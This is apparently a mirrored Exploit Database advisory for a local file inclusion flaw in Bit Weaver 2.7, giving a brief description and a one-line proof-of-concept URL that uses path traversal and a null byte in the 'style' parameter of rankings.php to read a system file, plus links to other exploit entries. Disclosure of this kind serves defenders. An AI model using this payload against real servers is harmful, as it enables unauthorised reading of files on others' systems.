Bit Weaver 2.7 – Local File Inclusion

Exploit Database
32 阅读

作者： John Leitch

日期： 2010-07-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14166/

------------------------------------------------------------------------
Software................Bit Weaver 2.7
Vulnerability...........Local File Inclusion
Download................http://www.bitweaver.org/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in Bit Weaver 2.7 can be
exploited to include arbitrary files.


--PoC--

http://server/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00

last Exploits
Bit Weaver 2.7 – Local File Inclusion的更多信息

Advanced Electron Forum 1.0.9 – Remote File Inclusion / Cross-Site Request Forgery：
Aspgwy Access 1.0 – ‘matchword’ Cross-Site Scripting：
PHPKB Knowledge Base Software 2.0 – Multilanguage Support Multiple SQL Injections：
AdaptCMS 2.0.2 TinyURL Plugin – ‘admin.php’ Multiple SQL Injections：
DomainMOD 4.11.01 – ‘ssl-provider-name’ Cross-Site Scripting：
WordPress Plugin Playlist for Youtube 1.32 – Stored Cross-Site Scripting (XSS)：
webpagetest 2.6 – Multiple Vulnerabilities：
XpoLog Center 6 – Remote Command Execution / Cross-Site Request Forgery：